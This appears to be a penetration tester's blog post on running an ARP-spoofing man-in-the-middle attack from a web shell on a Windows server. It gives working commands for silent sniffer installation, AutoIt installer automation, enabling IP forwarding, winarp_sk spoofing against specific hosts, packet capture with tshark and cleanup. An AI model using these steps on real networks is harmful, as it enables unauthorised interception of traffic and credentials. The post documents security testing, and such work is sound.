Man in the middle attack through a web shell

Hello all.

Let’s talk today about Man in the middle attack. No, this isn’t a post talking about what it is and how to perform a MITM attack. The proposal of this blog is to share experience with you, then most of the posts (at least until now) are about things that happened in real environments. Recently performing a penetration testing it was possible to get a web shell through a combination of vulnerabilities. That’s good… a web shell right? But how about to going deep and explore more of the environment? Yes, if you thought about reverse web shell you are right, but, in this case, I couldn’t establish an outbound connection (this is a subject for another post). I did a lot of things in such environment and one of the things done was a MITM attack through a web shell. Let’s go to some important details. First of all, it was a Windows box. There are some tools you can perform a MITM attack on Windows box such as Cain & Abel, but remember, we had a web shell and this tool is a GUI tool (forgive me if there is a command line version). There is an old command line tool called winarp_sk, which is still available and functional to perform an arpspoofing attack. This tool seemed to be great for my case. You can find the source as well the executable to download, but it requires WinPcap to work (it uses packet.dll). This is the other problem: how to install WinPcap through command line. To perform a MITM we need a sniffer. Wireshark (tshark command line) was really good. And last but not least: to do all these things you need a user with high privileges (e.g. Administrator, System). In our case, (un)fortunately the user running the web server was Local System. Let’s check the anatomy of the attack.

1) Upload winarp_sk.exe

With the web shell was possible to upload the winarp_sk.exe file. I also checked it in Virus Total to see how some AV reacted against the file. The results can be verified here.

2) Upload Wireshark’s installer

When you install Wireshark usually it asks for the WinPcap installation, however, when you are installing it on a silent mode it doesn’t install WinPcap.

You can run the Wireshark’s installer in silent mode.

wireshark-win32-1.2.7.exe /S /desktopicon=no /quicklaunchicon=no /D=path-to-install

/S specifies it’s going to be in silent mode

/Desktopicon=no it doesn’t create a desktop icon

/quilaunchicon=no it doesn’t create a quick launch icon

3) Upload the installer of WinPcap x86.

This was a tricky part of the thing. I looked at the documentation and there is no way to install it in a silent mode. Then we needed some interaction, but, we didn’t have a reverse web shell (e.g. using VNC ). There were two options: build a program in C and use the sendkey feature or use some program that does it for us. The solution: AutoIT. According to its home page, AutoIT is a freeware BASIC-like scripting language designed for automation the Windows GUI and general scripting. You can use it to automate keystrokes, mouse movement and window/control manipulation. You can create your script and execute it with AutoIT Run Script tool or you can compile it to an independent executable (no, you don’t need any runtime libraries!). Thanks to Brian Desmond, there is a script available on the internet to install Winpcap silently:

; ==========================================================================

; NAME: WinPcap AutoIt Installer

;

; AUTHOR: Brian Desmond, brian@briandesmond.com

; DATE : 11/28/2009

; ==========================================================================

#RequireAdmin

Run("WinPcap_4_1_1.exe")

WinWaitActive("WinPcap 4.1.1 Setup")

Send("!n")

WinWaitActive("WinPcap 4.1.1 Setup", "Welcome to the WinPcap")

Send("!n")

WinWaitActive("WinPcap 4.1.1 Setup", "License Agreement")

Send("!a")

WinWaitActive("WinPcap 4.1.1 Setup", "Installation options")

ControlClick("WinPcap 4.1.1 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]") ; hack to click the install button

WinWaitActive("WinPcap 4.1.1 Setup", "Completing the WinPcap")

Send("!f")

4) Configure Windows to forward packets (alter registry key)

Activate IP forward

reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v IPEnableRouter /d 1 /t REG_DWORD /f

Deactivate IP forward

reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v IPEnableRouter /d 0 /t REG_DWORD /f

Note that after the configuration, Windows needed be to be restarted. There were some things we needed to pay attention here: a) could we perform shutdown? Sometimes policies applied on Windows restrict this privilege to only a specific user. b) if we could perform shutdown, was the web server going to restart automatically? We needed to check it. Unfortunately the web server (JBOSS) was programmed to not start automatically. Then it came in hand SC utility to change the service and make it start automatically (even it’s a very suspicious activity rebooting a server but we needed it).

5) Performing the arpspoof attack

When you call winarp_sk you need to provide one parameter informing from which interface you would like to send the arp packets. In our case, we didn’t have a interactive shell. To make it works we needed to echo the interface number:

echo 1|winarp_sk.exe -m 2 -s 172.31.10.104 -d 172.31.10.2 -c 10

Things to observe: the option –c specifies how many packets you want to send to the target. If you don’t provide the number winarp_sk keeps sending packets until you kill the process. Taskkill was our friend in this case.

6) Capturing packets

Tshark is a command line utility that comes with Wireshark. Then it was possible to launch it through our web shell:

tshark -i 1 -c 300 -w 300packets.pcap

After the packets being captured, we downloaded the file and examine the contents of the file.

7) Uninstall Wireshark + WinPcap

Here we used the same logic: AutoIT to make the uninstalation process.

;==========================================================================

; NAME: Wireshark + WinPcap uninstaller (AutoIT)

;

; AUTHOR: Ismael Gonçalves, http://sharingsec.blogspot.com

; DATE : 11/21/2012

; ==========================================================================

Run("C:\Program Files\Wireshark\uninstall.exe")